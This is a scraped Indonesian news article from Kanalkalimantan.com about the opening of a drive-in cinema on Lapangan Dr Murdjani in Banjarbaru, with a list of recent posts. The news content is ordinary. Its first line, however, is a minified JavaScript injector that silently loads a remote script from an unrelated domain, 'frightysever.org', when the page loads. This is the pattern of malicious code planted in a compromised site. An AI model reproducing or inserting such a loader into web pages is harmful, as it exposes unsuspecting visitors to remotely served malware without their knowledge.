(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Layar Videotron, “Murdjani Drive-In Cinema” Tawarkan Nonton Film di Dalam Mobil


KANALKALIMANTAN.COM, BANJARBARU – Sensasi menonton bioskop era tahun 1980-an kini bisa dinikmati di Kota Banjarbaru. Drive-in atau fasilitas menonton film layar lebar dari dalam mobil itu diberi nama “Murdjani Drive-in Cinema”.

Sesuai dengan namanya, fasilitas ini berlokasi di Lapangan Dr Murdjani, tepat di jantung perkotaan. Pemutaran film pendek berjudul “Prabu Fire Rescue” dan “Pangeran Antasari”, Minggu (13/2/2022) malam, menjadi penanda diresmikannya fasilitas ini bagi masyarakat umum.

Murdjani Drive-in Cinema menggunakan sebuah layar videotron berukuran cukup besar yang beberapa waktu lalu dibangun oleh Pemerintah Kota (Pemko) Banjarbaru. Agar bisa mendengarkan audio film dari dalam mobil, penonton dapat menyalakan radio melalui frekuensi 108 FM.

“Lokasi pemutaran filmnya representatif untuk konsep Drive-In. Lapangan Dr Murdjani cukup luas untuk menampung banyak mobil,” kata Kepala Dinas Pemuda, Olahraga, Kebudayaan, dan Pariwisata (Disporabudpar) Kota Banjarbaru, Ahmad Yani Makkie.

 

Baca juga : Badai Omicron Tidak Menghambat ke Sektor Ekonomi Indonesia

Selain itu, menurut Yani Makkie pemutaran film Pangeran Antasari sebagai tanda diresmikannya Murdjani Drive-in Cinema nyatanya mampu menarik perhatian masyarakat. Meskipun tujuan utama pemutaran film ini ialah demi mengenang sejarah perjuangan Pangeran Antasari melawan penjajahan Belanda di Kalimantan Selatan.

“Tadi memang ada puluhan undangan yang kita hadirkan. Mobilnya kita susun rapi tepat di depan videotron. Nah yang tidak kita sangka ternyata masyarakat yang bersantai di sekitaran lapangan Murdjani juga antusias menyaksikan film ini,” tuturnya.

Salah satunya, Risna yang mengaku sangat antusias melihat bioskop konsep outdoor kini ada di Banjarbaru. Ditambah lagi pemutaran filmnya bertemakan sejarah-sejarah perjuangan, khususnya di Kalimantan Selatan.

Wanita paruh baya ini juga menyampaikan ucapan terima kasihnya kepada Pemerintah Kota Banjarbaru, khususnya Wali Kota Banjarbaru, Aditya Mufti Ariffin yang telah memfasilitasi pemutaran film berkonsep drive-in di Lapangan Dr Murdjani.

 

 

Baca juga : MotoGP Takjub Bagikan Foto Sirkuit Mandalika: Sirkuit Tercantik di Dunia!

“Saya sebagai warga Banjarbaru merasa senang dan bangga, soalnya konsep drive-in ini baru pertama kali ada di Banjarbaru. Semoga pemutaran film seperti ini bisa rutin diadakan,” ucap Risna.

Meski terbuka dan bisa disaksikan masyarakat umum secara gratis, aturan protokol kesehatan tetap diterapkan selama pemutaran film berlangsung. Hal ini dilakukan guna mencegah penyebaran Covid-19. (Kanalkalimantan.com/al)

Reporter : Al
Editor : Al


Desy Arfianty

Recent Posts

780 Anggota PPK se Kalsel Dilantik, Bertugas 8 Bulan

KANALKALIMANTAN.COM, BANJARBARU - Seluruh Panitia Pemilihan Kecamatan (PPK) di Provinsi Kalimantan Selatan (Kalsel) resmi dilantik… Read More

2 menit ago

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

4 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

15 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

17 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

17 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

17 jam ago

This website uses cookies.